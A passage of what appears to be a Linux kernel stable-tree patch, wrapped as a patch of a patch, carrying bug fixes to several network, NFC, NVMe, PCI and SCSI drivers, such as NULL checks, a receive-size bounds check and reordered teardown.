+-			err = esw_setup_ft_dest(dest, flow_act, esw, attr, spec, *i);
++			err = esw_setup_ft_dest(dest, flow_act, esw, attr, *i);
+ 			(*i)++;
+ 		} else if (attr->dest_chain) {
+ 			err = esw_setup_chain_dest(dest, flow_act, chains, attr->dest_chain,
+@@ -699,11 +696,11 @@ mlx5_eswitch_add_fwd_rule(struct mlx5_eswitch *esw,
+ 
+ 	flow_act.action = MLX5_FLOW_CONTEXT_ACTION_FWD_DEST;
+ 	for (i = 0; i < esw_attr->split_count; i++) {
+-		if (esw_is_indir_table(esw, attr))
+-			err = esw_setup_indir_table(dest, &flow_act, esw, attr, spec, false, &i);
+-		else if (esw_is_chain_src_port_rewrite(esw, esw_attr))
+-			err = esw_setup_chain_src_port_rewrite(dest, &flow_act, esw, chains, attr,
+-							       &i);
++		if (esw_attr->dests[i].flags & MLX5_ESW_DEST_CHAIN_WITH_SRC_PORT_CHANGE)
++			/* Source port rewrite (forward to ovs internal port or statck device) isn't
++			 * supported in the rule of split action.
++			 */
++			err = -EOPNOTSUPP;
+ 		else
+ 			esw_setup_vport_dest(dest, &flow_act, esw, esw_attr, i, i, false);
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib.c b/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib.c
+index 038ae0fcf9d45..aed4e896179a3 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib.c
+@@ -70,7 +70,6 @@ static void mlx5i_build_nic_params(struct mlx5_core_dev *mdev,
+ 
+ 	params->packet_merge.type = MLX5E_PACKET_MERGE_NONE;
+ 	params->hard_mtu = MLX5_IB_GRH_BYTES + MLX5_IPOIB_HARD_LEN;
+-	params->tunneled_offload_en = false;
+ 
+ 	/* CQE compression is not supported for IPoIB */
+ 	params->rx_cqe_compress_def = false;
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/main.c b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+index f07175549a87d..59914f66857da 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+@@ -1339,8 +1339,8 @@ err_irq_table:
+ static void mlx5_unload(struct mlx5_core_dev *dev)
+ {
+ 	mlx5_sf_dev_table_destroy(dev);
+-	mlx5_sriov_detach(dev);
+ 	mlx5_eswitch_disable(dev->priv.eswitch);
++	mlx5_sriov_detach(dev);
+ 	mlx5_lag_remove_mdev(dev);
+ 	mlx5_ec_cleanup(dev);
+ 	mlx5_sf_hw_table_destroy(dev);
+@@ -1752,11 +1752,11 @@ static void remove_one(struct pci_dev *pdev)
+ 	struct mlx5_core_dev *dev  = pci_get_drvdata(pdev);
+ 	struct devlink *devlink = priv_to_devlink(dev);
+ 
++	set_bit(MLX5_BREAK_FW_WAIT, &dev->intf_state);
+ 	/* mlx5_drain_fw_reset() is using devlink APIs. Hence, we must drain
+ 	 * fw_reset before unregistering the devlink.
+ 	 */
+ 	mlx5_drain_fw_reset(dev);
+-	set_bit(MLX5_BREAK_FW_WAIT, &dev->intf_state);
+ 	devlink_unregister(devlink);
+ 	mlx5_sriov_disable(pdev);
+ 	mlx5_crdump_disable(dev);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/pagealloc.c b/drivers/net/ethernet/mellanox/mlx5/core/pagealloc.c
+index 64d4e7125e9bb..95dc67fb30015 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/pagealloc.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/pagealloc.c
+@@ -82,6 +82,16 @@ static u16 func_id_to_type(struct mlx5_core_dev *dev, u16 func_id, bool ec_funct
+ 	return func_id <= mlx5_core_max_vfs(dev) ?  MLX5_VF : MLX5_SF;
+ }
+ 
++static u32 mlx5_get_ec_function(u32 function)
++{
++	return function >> 16;
++}
++
++static u32 mlx5_get_func_id(u32 function)
++{
++	return function & 0xffff;
++}
++
+ static struct rb_root *page_root_per_function(struct mlx5_core_dev *dev, u32 function)
+ {
+ 	struct rb_root *root;
+@@ -665,20 +675,22 @@ static int optimal_reclaimed_pages(void)
+ }
+ 
+ static int mlx5_reclaim_root_pages(struct mlx5_core_dev *dev,
+-				   struct rb_root *root, u16 func_id)
++				   struct rb_root *root, u32 function)
+ {
+ 	u64 recl_pages_to_jiffies = msecs_to_jiffies(mlx5_tout_ms(dev, RECLAIM_PAGES));
+ 	unsigned long end = jiffies + recl_pages_to_jiffies;
+ 
+ 	while (!RB_EMPTY_ROOT(root)) {
++		u32 ec_function = mlx5_get_ec_function(function);
++		u32 function_id = mlx5_get_func_id(function);
+ 		int nclaimed;
+ 		int err;
+ 
+-		err = reclaim_pages(dev, func_id, optimal_reclaimed_pages(),
+-				    &nclaimed, false, mlx5_core_is_ecpf(dev));
++		err = reclaim_pages(dev, function_id, optimal_reclaimed_pages(),
++				    &nclaimed, false, ec_function);
+ 		if (err) {
+-			mlx5_core_warn(dev, "failed reclaiming pages (%d) for func id 0x%x\n",
+-				       err, func_id);
++			mlx5_core_warn(dev, "reclaim_pages err (%d) func_id=0x%x ec_func=0x%x\n",
++				       err, function_id, ec_function);
+ 			return err;
+ 		}
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/spectrum.c b/drivers/net/ethernet/mellanox/mlxsw/spectrum.c
+index 5bcf5bceff710..67ecdb9e708f9 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/spectrum.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/spectrum.c
+@@ -2931,6 +2931,7 @@ static int mlxsw_sp_netdevice_event(struct notifier_block *unused,
+ 
+ static void mlxsw_sp_parsing_init(struct mlxsw_sp *mlxsw_sp)
+ {
++	refcount_set(&mlxsw_sp->parsing.parsing_depth_ref, 0);
+ 	mlxsw_sp->parsing.parsing_depth = MLXSW_SP_DEFAULT_PARSING_DEPTH;
+ 	mlxsw_sp->parsing.vxlan_udp_dport = MLXSW_SP_DEFAULT_VXLAN_UDP_DPORT;
+ 	mutex_init(&mlxsw_sp->parsing.lock);
+@@ -2939,6 +2940,7 @@ static void mlxsw_sp_parsing_init(struct mlxsw_sp *mlxsw_sp)
+ static void mlxsw_sp_parsing_fini(struct mlxsw_sp *mlxsw_sp)
+ {
+ 	mutex_destroy(&mlxsw_sp->parsing.lock);
++	WARN_ON_ONCE(refcount_read(&mlxsw_sp->parsing.parsing_depth_ref));
+ }
+ 
+ struct mlxsw_sp_ipv6_addr_node {
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c b/drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c
+index 48f1fa62a4fd4..ab0aa1a61d4aa 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c
+@@ -10313,11 +10313,23 @@ err_reg_write:
+ 					      old_inc_parsing_depth);
+ 	return err;
+ }
++
++static void mlxsw_sp_mp_hash_fini(struct mlxsw_sp *mlxsw_sp)
++{
++	bool old_inc_parsing_depth = mlxsw_sp->router->inc_parsing_depth;
++
++	mlxsw_sp_mp_hash_parsing_depth_adjust(mlxsw_sp, old_inc_parsing_depth,
++					      false);
++}
+ #else
+ static int mlxsw_sp_mp_hash_init(struct mlxsw_sp *mlxsw_sp)
+ {
+ 	return 0;
+ }
++
++static void mlxsw_sp_mp_hash_fini(struct mlxsw_sp *mlxsw_sp)
++{
++}
+ #endif
+ 
+ static int mlxsw_sp_dscp_init(struct mlxsw_sp *mlxsw_sp)
+@@ -10547,6 +10559,7 @@ err_register_inet6addr_notifier:
+ err_register_inetaddr_notifier:
+ 	mlxsw_core_flush_owq();
+ err_dscp_init:
++	mlxsw_sp_mp_hash_fini(mlxsw_sp);
+ err_mp_hash_init:
+ 	mlxsw_sp_neigh_fini(mlxsw_sp);
+ err_neigh_init:
+@@ -10587,6 +10600,7 @@ void mlxsw_sp_router_fini(struct mlxsw_sp *mlxsw_sp)
+ 	unregister_inet6addr_notifier(&mlxsw_sp->router->inet6addr_nb);
+ 	unregister_inetaddr_notifier(&mlxsw_sp->router->inetaddr_nb);
+ 	mlxsw_core_flush_owq();
++	mlxsw_sp_mp_hash_fini(mlxsw_sp);
+ 	mlxsw_sp_neigh_fini(mlxsw_sp);
+ 	mlxsw_sp_lb_rif_fini(mlxsw_sp);
+ 	mlxsw_sp_vrs_fini(mlxsw_sp);
+diff --git a/drivers/net/ethernet/qlogic/qed/qed_dev.c b/drivers/net/ethernet/qlogic/qed/qed_dev.c
+index d61cd32ec3b65..86a93cac26470 100644
+--- a/drivers/net/ethernet/qlogic/qed/qed_dev.c
++++ b/drivers/net/ethernet/qlogic/qed/qed_dev.c
+@@ -5083,6 +5083,11 @@ static int qed_init_wfq_param(struct qed_hwfn *p_hwfn,
+ 
+ 	num_vports = p_hwfn->qm_info.num_vports;
+ 
++	if (num_vports < 2) {
++		DP_NOTICE(p_hwfn, "Unexpected num_vports: %d\n", num_vports);
++		return -EINVAL;
++	}
++
+ 	/* Accounting for the vports which are configured for WFQ explicitly */
+ 	for (i = 0; i < num_vports; i++) {
+ 		u32 tmp_speed;
+diff --git a/drivers/net/ethernet/qlogic/qed/qed_mng_tlv.c b/drivers/net/ethernet/qlogic/qed/qed_mng_tlv.c
+index 6190adf965bca..f55eed092f25d 100644
+--- a/drivers/net/ethernet/qlogic/qed/qed_mng_tlv.c
++++ b/drivers/net/ethernet/qlogic/qed/qed_mng_tlv.c
+@@ -422,7 +422,7 @@ qed_mfw_get_tlv_time_value(struct qed_mfw_tlv_time *p_time,
+ 	if (p_time->hour > 23)
+ 		p_time->hour = 0;
+ 	if (p_time->min > 59)
+-		p_time->hour = 0;
++		p_time->min = 0;
+ 	if (p_time->msec > 999)
+ 		p_time->msec = 0;
+ 	if (p_time->usec > 999)
+diff --git a/drivers/net/ethernet/renesas/ravb_main.c b/drivers/net/ethernet/renesas/ravb_main.c
+index 0f54849a38235..894e2690c6437 100644
+--- a/drivers/net/ethernet/renesas/ravb_main.c
++++ b/drivers/net/ethernet/renesas/ravb_main.c
+@@ -1455,8 +1455,6 @@ static int ravb_phy_init(struct net_device *ndev)
+ 		phy_remove_link_mode(phydev, ETHTOOL_LINK_MODE_100baseT_Half_BIT);
+ 	}
+ 
+-	/* Indicate that the MAC is responsible for managing PHY PM */
+-	phydev->mac_managed_pm = true;
+ 	phy_attached_info(phydev);
+ 
+ 	return 0;
+@@ -2379,6 +2377,8 @@ static int ravb_mdio_init(struct ravb_private *priv)
+ {
+ 	struct platform_device *pdev = priv->pdev;
+ 	struct device *dev = &pdev->dev;
++	struct phy_device *phydev;
++	struct device_node *pn;
+ 	int error;
+ 
+ 	/* Bitbang init */
+@@ -2400,6 +2400,14 @@ static int ravb_mdio_init(struct ravb_private *priv)
+ 	if (error)
+ 		goto out_free_bus;
+ 
++	pn = of_parse_phandle(dev->of_node, "phy-handle", 0);
++	phydev = of_phy_find_device(pn);
++	if (phydev) {
++		phydev->mac_managed_pm = true;
++		put_device(&phydev->mdio.dev);
++	}
++	of_node_put(pn);
++
+ 	return 0;
+ 
+ out_free_bus:
+diff --git a/drivers/net/ethernet/renesas/sh_eth.c b/drivers/net/ethernet/renesas/sh_eth.c
+index 71a4991133080..14dc5833c465c 100644
+--- a/drivers/net/ethernet/renesas/sh_eth.c
++++ b/drivers/net/ethernet/renesas/sh_eth.c
+@@ -2029,8 +2029,6 @@ static int sh_eth_phy_init(struct net_device *ndev)
+ 	if (mdp->cd->register_type != SH_ETH_REG_GIGABIT)
+ 		phy_set_max_speed(phydev, SPEED_100);
+ 
+-	/* Indicate that the MAC is responsible for managing PHY PM */
+-	phydev->mac_managed_pm = true;
+ 	phy_attached_info(phydev);
+ 
+ 	return 0;
+@@ -3074,6 +3072,8 @@ static int sh_mdio_init(struct sh_eth_private *mdp,
+ 	struct bb_info *bitbang;
+ 	struct platform_device *pdev = mdp->pdev;
+ 	struct device *dev = &mdp->pdev->dev;
++	struct phy_device *phydev;
++	struct device_node *pn;
+ 
+ 	/* create bit control struct for PHY */
+ 	bitbang = devm_kzalloc(dev, sizeof(struct bb_info), GFP_KERNEL);
+@@ -3108,6 +3108,14 @@ static int sh_mdio_init(struct sh_eth_private *mdp,
+ 	if (ret)
+ 		goto out_free_bus;
+ 
++	pn = of_parse_phandle(dev->of_node, "phy-handle", 0);
++	phydev = of_phy_find_device(pn);
++	if (phydev) {
++		phydev->mac_managed_pm = true;
++		put_device(&phydev->mdio.dev);
++	}
++	of_node_put(pn);
++
+ 	return 0;
+ 
+ out_free_bus:
+diff --git a/drivers/net/ethernet/sun/ldmvsw.c b/drivers/net/ethernet/sun/ldmvsw.c
+index 8addee6d04bd8..734a817d3c945 100644
+--- a/drivers/net/ethernet/sun/ldmvsw.c
++++ b/drivers/net/ethernet/sun/ldmvsw.c
+@@ -287,6 +287,9 @@ static int vsw_port_probe(struct vio_dev *vdev, const struct vio_device_id *id)
+ 
+ 	hp = mdesc_grab();
+ 
++	if (!hp)
++		return -ENODEV;
++
+ 	rmac = mdesc_get_property(hp, vdev->mp, remote_macaddr_prop, &len);
+ 	err = -ENODEV;
+ 	if (!rmac) {
+diff --git a/drivers/net/ethernet/sun/sunvnet.c b/drivers/net/ethernet/sun/sunvnet.c
+index acda6cbd0238d..bdf4c8be2d536 100644
+--- a/drivers/net/ethernet/sun/sunvnet.c
++++ b/drivers/net/ethernet/sun/sunvnet.c
+@@ -433,6 +433,9 @@ static int vnet_port_probe(struct vio_dev *vdev, const struct vio_device_id *id)
+ 
+ 	hp = mdesc_grab();
+ 
++	if (!hp)
++		return -ENODEV;
++
+ 	vp = vnet_find_parent(hp, vdev->mp, vdev);
+ 	if (IS_ERR(vp)) {
+ 		pr_err("Cannot find port parent vnet\n");
+diff --git a/drivers/net/ipvlan/ipvlan_l3s.c b/drivers/net/ipvlan/ipvlan_l3s.c
+index 943d26cbf39f5..71712ea25403d 100644
+--- a/drivers/net/ipvlan/ipvlan_l3s.c
++++ b/drivers/net/ipvlan/ipvlan_l3s.c
+@@ -101,6 +101,7 @@ static unsigned int ipvlan_nf_input(void *priv, struct sk_buff *skb,
+ 		goto out;
+ 
+ 	skb->dev = addr->master->dev;
++	skb->skb_iif = skb->dev->ifindex;
+ 	len = skb->len + ETH_HLEN;
+ 	ipvlan_count_rx(addr->master, len, true, false);
+ out:
+diff --git a/drivers/net/phy/nxp-c45-tja11xx.c b/drivers/net/phy/nxp-c45-tja11xx.c
+index 047c581457e34..5813b07242ce1 100644
+--- a/drivers/net/phy/nxp-c45-tja11xx.c
++++ b/drivers/net/phy/nxp-c45-tja11xx.c
+@@ -79,7 +79,7 @@
+ #define SGMII_ABILITY			BIT(0)
+ 
+ #define VEND1_MII_BASIC_CONFIG		0xAFC6
+-#define MII_BASIC_CONFIG_REV		BIT(8)
++#define MII_BASIC_CONFIG_REV		BIT(4)
+ #define MII_BASIC_CONFIG_SGMII		0x9
+ #define MII_BASIC_CONFIG_RGMII		0x7
+ #define MII_BASIC_CONFIG_RMII		0x5
+diff --git a/drivers/net/phy/smsc.c b/drivers/net/phy/smsc.c
+index 00d9eff91dcfa..df2c5435c5c49 100644
+--- a/drivers/net/phy/smsc.c
++++ b/drivers/net/phy/smsc.c
+@@ -199,8 +199,11 @@ static int lan95xx_config_aneg_ext(struct phy_device *phydev)
+ static int lan87xx_read_status(struct phy_device *phydev)
+ {
+ 	struct smsc_phy_priv *priv = phydev->priv;
++	int err;
+ 
+-	int err = genphy_read_status(phydev);
++	err = genphy_read_status(phydev);
++	if (err)
++		return err;
+ 
+ 	if (!phydev->link && priv->energy_enable && phydev->irq == PHY_POLL) {
+ 		/* Disable EDPD to wake up PHY */
+diff --git a/drivers/net/usb/smsc75xx.c b/drivers/net/usb/smsc75xx.c
+index 95de452ff4dad..5d6454fedb3f1 100644
+--- a/drivers/net/usb/smsc75xx.c
++++ b/drivers/net/usb/smsc75xx.c
+@@ -2200,6 +2200,13 @@ static int smsc75xx_rx_fixup(struct usbnet *dev, struct sk_buff *skb)
+ 		size = (rx_cmd_a & RX_CMD_A_LEN) - RXW_PADDING;
+ 		align_count = (4 - ((size + RXW_PADDING) % 4)) % 4;
+ 
++		if (unlikely(size > skb->len)) {
++			netif_dbg(dev, rx_err, dev->net,
++				  "size err rx_cmd_a=0x%08x\n",
++				  rx_cmd_a);
++			return 0;
++		}
++
+ 		if (unlikely(rx_cmd_a & RX_CMD_A_RED)) {
+ 			netif_dbg(dev, rx_err, dev->net,
+ 				  "Error rx_cmd_a=0x%08x\n", rx_cmd_a);
+diff --git a/drivers/net/veth.c b/drivers/net/veth.c
+index bd385ccd0d18d..a71786b3e7ba7 100644
+--- a/drivers/net/veth.c
++++ b/drivers/net/veth.c
+@@ -701,7 +701,8 @@ static int veth_convert_skb_to_xdp_buff(struct veth_rq *rq,
+ 	u32 frame_sz;
+ 
+ 	if (skb_shared(skb) || skb_head_is_locked(skb) ||
+-	    skb_shinfo(skb)->nr_frags) {
++	    skb_shinfo(skb)->nr_frags ||
++	    skb_headroom(skb) < XDP_PACKET_HEADROOM) {
+ 		u32 size, len, max_head_size, off;
+ 		struct sk_buff *nskb;
+ 		struct page *page;
+@@ -766,9 +767,6 @@ static int veth_convert_skb_to_xdp_buff(struct veth_rq *rq,
+ 
+ 		consume_skb(skb);
+ 		skb = nskb;
+-	} else if (skb_headroom(skb) < XDP_PACKET_HEADROOM &&
+-		   pskb_expand_head(skb, VETH_XDP_HEADROOM, 0, GFP_ATOMIC)) {
+-		goto drop;
+ 	}
+ 
+ 	/* SKB "head" area always have tailroom for skb_shared_info */
+diff --git a/drivers/nfc/pn533/usb.c b/drivers/nfc/pn533/usb.c
+index ed9c5e2cf3ad4..a187f0e0b0f7d 100644
+--- a/drivers/nfc/pn533/usb.c
++++ b/drivers/nfc/pn533/usb.c
+@@ -175,6 +175,7 @@ static int pn533_usb_send_frame(struct pn533 *dev,
+ 	print_hex_dump_debug("PN533 TX: ", DUMP_PREFIX_NONE, 16, 1,
+ 			     out->data, out->len, false);
+ 
++	arg.phy = phy;
+ 	init_completion(&arg.done);
+ 	cntx = phy->out_urb->context;
+ 	phy->out_urb->context = &arg;
+diff --git a/drivers/nfc/st-nci/ndlc.c b/drivers/nfc/st-nci/ndlc.c
+index 755460a73c0dc..d2aa9f766738e 100644
+--- a/drivers/nfc/st-nci/ndlc.c
++++ b/drivers/nfc/st-nci/ndlc.c
+@@ -282,13 +282,15 @@ EXPORT_SYMBOL(ndlc_probe);
+ 
+ void ndlc_remove(struct llt_ndlc *ndlc)
+ {
+-	st_nci_remove(ndlc->ndev);
+-
+ 	/* cancel timers */
+ 	del_timer_sync(&ndlc->t1_timer);
+ 	del_timer_sync(&ndlc->t2_timer);
+ 	ndlc->t2_active = false;
+ 	ndlc->t1_active = false;
++	/* cancel work */
++	cancel_work_sync(&ndlc->sm_work);
++
++	st_nci_remove(ndlc->ndev);
+ 
+ 	skb_queue_purge(&ndlc->rcv_q);
+ 	skb_queue_purge(&ndlc->send_q);
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index 2031fd960549c..a95e48b51da66 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -779,16 +779,26 @@ static blk_status_t nvme_setup_discard(struct nvme_ns *ns, struct request *req,
+ 		range = page_address(ns->ctrl->discard_page);
+ 	}
+ 
+-	__rq_for_each_bio(bio, req) {
+-		u64 slba = nvme_sect_to_lba(ns, bio->bi_iter.bi_sector);
+-		u32 nlb = bio->bi_iter.bi_size >> ns->lba_shift;
+-
+-		if (n < segments) {
+-			range[n].cattr = cpu_to_le32(0);
+-			range[n].nlb = cpu_to_le32(nlb);
+-			range[n].slba = cpu_to_le64(slba);
++	if (queue_max_discard_segments(req->q) == 1) {
++		u64 slba = nvme_sect_to_lba(ns, blk_rq_pos(req));
++		u32 nlb = blk_rq_sectors(req) >> (ns->lba_shift - 9);
++
++		range[0].cattr = cpu_to_le32(0);
++		range[0].nlb = cpu_to_le32(nlb);
++		range[0].slba = cpu_to_le64(slba);
++		n = 1;
++	} else {
++		__rq_for_each_bio(bio, req) {
++			u64 slba = nvme_sect_to_lba(ns, bio->bi_iter.bi_sector);
++			u32 nlb = bio->bi_iter.bi_size >> ns->lba_shift;
++
++			if (n < segments) {
++				range[n].cattr = cpu_to_le32(0);
++				range[n].nlb = cpu_to_le32(nlb);
++				range[n].slba = cpu_to_le64(slba);
++			}
++			n++;
+ 		}
+-		n++;
+ 	}
+ 
+ 	if (WARN_ON_ONCE(n != segments)) {
+diff --git a/drivers/nvme/host/pci.c b/drivers/nvme/host/pci.c
+index 778f94e9a4453..100f774bc97fa 100644
+--- a/drivers/nvme/host/pci.c
++++ b/drivers/nvme/host/pci.c
+@@ -3525,6 +3525,8 @@ static const struct pci_device_id nvme_id_table[] = {
+ 		.driver_data = NVME_QUIRK_DISABLE_WRITE_ZEROES, },
+ 	{ PCI_DEVICE(0x2646, 0x501E),   /* KINGSTON OM3PGP4xxxxQ OS21011 NVMe SSD */
+ 		.driver_data = NVME_QUIRK_DISABLE_WRITE_ZEROES, },
++	{ PCI_DEVICE(0x1f40, 0x1202),   /* Netac Technologies Co. NV3000 NVMe SSD */
++		.driver_data = NVME_QUIRK_BOGUS_NID, },
+ 	{ PCI_DEVICE(0x1f40, 0x5236),   /* Netac Technologies Co. NV7000 NVMe SSD */
+ 		.driver_data = NVME_QUIRK_BOGUS_NID, },
+ 	{ PCI_DEVICE(0x1e4B, 0x1001),   /* MAXIO MAP1001 */
+diff --git a/drivers/nvme/target/core.c b/drivers/nvme/target/core.c
+index 683b75a992b3d..3235baf7cc6b1 100644
+--- a/drivers/nvme/target/core.c
++++ b/drivers/nvme/target/core.c
+@@ -755,8 +755,10 @@ static void __nvmet_req_complete(struct nvmet_req *req, u16 status)
+ 
+ void nvmet_req_complete(struct nvmet_req *req, u16 status)
+ {
++	struct nvmet_sq *sq = req->sq;
++
+ 	__nvmet_req_complete(req, status);
+-	percpu_ref_put(&req->sq->ref);
++	percpu_ref_put(&sq->ref);
+ }
+ EXPORT_SYMBOL_GPL(nvmet_req_complete);
+ 
+diff --git a/drivers/pci/bus.c b/drivers/pci/bus.c
+index 3cef835b375fd..feafa378bf8ea 100644
+--- a/drivers/pci/bus.c
++++ b/drivers/pci/bus.c
+@@ -76,6 +76,27 @@ struct resource *pci_bus_resource_n(const struct pci_bus *bus, int n)
+ }
+ EXPORT_SYMBOL_GPL(pci_bus_resource_n);
+ 
++void pci_bus_remove_resource(struct pci_bus *bus, struct resource *res)
++{
++	struct pci_bus_resource *bus_res, *tmp;
++	int i;
++
++	for (i = 0; i < PCI_BRIDGE_RESOURCE_NUM; i++) {
++		if (bus->resource[i] == res) {
++			bus->resource[i] = NULL;
++			return;
++		}
++	}
++
++	list_for_each_entry_safe(bus_res, tmp, &bus->resources, list) {
++		if (bus_res->res == res) {
++			list_del(&bus_res->list);
++			kfree(bus_res);
++			return;
++		}
++	}
++}
++
+ void pci_bus_remove_resources(struct pci_bus *bus)
+ {
+ 	int i;
+diff --git a/drivers/scsi/hosts.c b/drivers/scsi/hosts.c
+index 85e66574ec414..45a2fd6584d16 100644
+--- a/drivers/scsi/hosts.c
++++ b/drivers/scsi/hosts.c
+@@ -341,9 +341,6 @@ static void scsi_host_dev_release(struct device *dev)
+ 	struct Scsi_Host *shost = dev_to_shost(dev);
+ 	struct device *parent = dev->parent;
+ 
+-	/* In case scsi_remove_host() has not been called. */
+-	scsi_proc_hostdir_rm(shost->hostt);
+-
+ 	/* Wait for functions invoked through call_rcu(&scmd->rcu, ...) */
+ 	rcu_barrier();
+ 
+diff --git a/drivers/scsi/mpi3mr/mpi3mr.h b/drivers/scsi/mpi3mr/mpi3mr.h
+index 8a438f248a820..de6914d57402c 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr.h
++++ b/drivers/scsi/mpi3mr/mpi3mr.h
+@@ -903,6 +903,7 @@ struct scmd_priv {
+  * @admin_reply_ephase:Admin reply queue expected phase
+  * @admin_reply_base: Admin reply queue base virtual address
+  * @admin_reply_dma: Admin reply queue base dma address
++ * @admin_reply_q_in_use: Queue is handled by poll/ISR
+  * @ready_timeout: Controller ready timeout
+  * @intr_info: Interrupt cookie pointer
+  * @intr_info_count: Number of interrupt cookies
+@@ -1056,6 +1057,7 @@ struct mpi3mr_ioc {
+ 	u8 admin_reply_ephase;
+ 	void *admin_reply_base;
+ 	dma_addr_t admin_reply_dma;
++	atomic_t admin_reply_q_in_use;
+ 
+ 	u32 ready_timeout;
+ 
+@@ -1391,4 +1393,7 @@ void mpi3mr_add_event_wait_for_device_refresh(struct mpi3mr_ioc *mrioc);
+ void mpi3mr_flush_drv_cmds(struct mpi3mr_ioc *mrioc);
+ void mpi3mr_flush_cmds_for_unrecovered_controller(struct mpi3mr_ioc *mrioc);
+ void mpi3mr_free_enclosure_list(struct mpi3mr_ioc *mrioc);
++int mpi3mr_process_admin_reply_q(struct mpi3mr_ioc *mrioc);
++void mpi3mr_expander_node_remove(struct mpi3mr_ioc *mrioc,
++	struct mpi3mr_sas_node *sas_expander);
+ #endif /*MPI3MR_H_INCLUDED*/
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_fw.c b/drivers/scsi/mpi3mr/mpi3mr_fw.c
+index 1e4467ea8472a..74fa7f90399e3 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_fw.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_fw.c
+@@ -415,7 +415,7 @@ out:
+ 		    le64_to_cpu(scsi_reply->sense_data_buffer_address));
+ }
+ 
+-static int mpi3mr_process_admin_reply_q(struct mpi3mr_ioc *mrioc)
++int mpi3mr_process_admin_reply_q(struct mpi3mr_ioc *mrioc)
+ {
+ 	u32 exp_phase = mrioc->admin_reply_ephase;
+ 	u32 admin_reply_ci = mrioc->admin_reply_ci;
+@@ -423,12 +423,17 @@ static int mpi3mr_process_admin_reply_q(struct mpi3mr_ioc *mrioc)
+ 	u64 reply_dma = 0;
+ 	struct mpi3_default_reply_descriptor *reply_desc;
+ 
++	if (!atomic_add_unless(&mrioc->admin_reply_q_in_use, 1, 1))
++		return 0;
++
+ 	reply_desc = (struct mpi3_default_reply_descriptor *)mrioc->admin_reply_base +
+ 	    admin_reply_ci;
+ 
+ 	if ((le16_to_cpu(reply_desc->reply_flags) &
+-	    MPI3_REPLY_DESCRIPT_FLAGS_PHASE_MASK) != exp_phase)
++	    MPI3_REPLY_DESCRIPT_FLAGS_PHASE_MASK) != exp_phase) {
++		atomic_dec(&mrioc->admin_reply_q_in_use);
+ 		return 0;
++	}
+ 
+ 	do {
+ 		if (mrioc->unrecoverable)
+@@ -454,6 +459,7 @@ static int mpi3mr_process_admin_reply_q(struct mpi3mr_ioc *mrioc)
+ 	writel(admin_reply_ci, &mrioc->sysif_regs->admin_reply_queue_ci);
+ 	mrioc->admin_reply_ci = admin_reply_ci;
+ 	mrioc->admin_reply_ephase = exp_phase;
++	atomic_dec(&mrioc->admin_reply_q_in_use);
+ 
+ 	return num_admin_replies;
+ }
+@@ -2605,6 +2611,7 @@ static int mpi3mr_setup_admin_qpair(struct mpi3mr_ioc *mrioc)
+ 	mrioc->admin_reply_ci = 0;
+ 	mrioc->admin_reply_ephase = 1;
+ 	mrioc->admin_reply_base = NULL;
++	atomic_set(&mrioc->admin_reply_q_in_use, 0);
+ 
+ 	if (!mrioc->admin_req_base) {
+ 		mrioc->admin_req_base = dma_alloc_coherent(&mrioc->pdev->dev,
+@@ -3814,27 +3821,34 @@ retry_init:
+ 
+ 	mpi3mr_print_ioc_info(mrioc);
+ 
+-	dprint_init(mrioc, "allocating config page buffers\n");
+-	mrioc->cfg_page = dma_alloc_coherent(&mrioc->pdev->dev,
+-	    MPI3MR_DEFAULT_CFG_PAGE_SZ, &mrioc->cfg_page_dma, GFP_KERNEL);
+-	if (!mrioc->cfg_page)
+-		goto out_failed_noretry;
+-
+-	mrioc->cfg_page_sz = MPI3MR_DEFAULT_CFG_PAGE_SZ;
++	if (!mrioc->cfg_page) {
++		dprint_init(mrioc, "allocating config page buffers\n");
++		mrioc->cfg_page_sz = MPI3MR_DEFAULT_CFG_PAGE_SZ;
++		mrioc->cfg_page = dma_alloc_coherent(&mrioc->pdev->dev,
++		    mrioc->cfg_page_sz, &mrioc->cfg_page_dma, GFP_KERNEL);
++		if (!mrioc->cfg_page) {
++			retval = -1;
++			goto out_failed_noretry;
++		}
++	}
+ 
+-	retval = mpi3mr_alloc_reply_sense_bufs(mrioc);
+-	if (retval) {
+-		ioc_err(mrioc,
+-		    "%s :Failed to allocated reply sense buffers %d\n",
+-		    __func__, retval);
+-		goto out_failed_noretry;
++	if (!mrioc->init_cmds.reply) {
++		retval = mpi3mr_alloc_reply_sense_bufs(mrioc);
++		if (retval) {
++			ioc_err(mrioc,
++			    "%s :Failed to allocated reply sense buffers %d\n",
++			    __func__, retval);
++			goto out_failed_noretry;
++		}
+ 	}
+ 
+-	retval = mpi3mr_alloc_chain_bufs(mrioc);
+-	if (retval) {
+-		ioc_err(mrioc, "Failed to allocated chain buffers %d\n",
+-		    retval);
+-		goto out_failed_noretry;
++	if (!mrioc->chain_sgl_list) {
++		retval = mpi3mr_alloc_chain_bufs(mrioc);
++		if (retval) {
++			ioc_err(mrioc, "Failed to allocated chain buffers %d\n",
++			    retval);
++			goto out_failed_noretry;
++		}
+ 	}
+ 
+ 	retval = mpi3mr_issue_iocinit(mrioc);
+@@ -3880,8 +3894,10 @@ retry_init:
+ 		dprint_init(mrioc, "allocating memory for throttle groups\n");
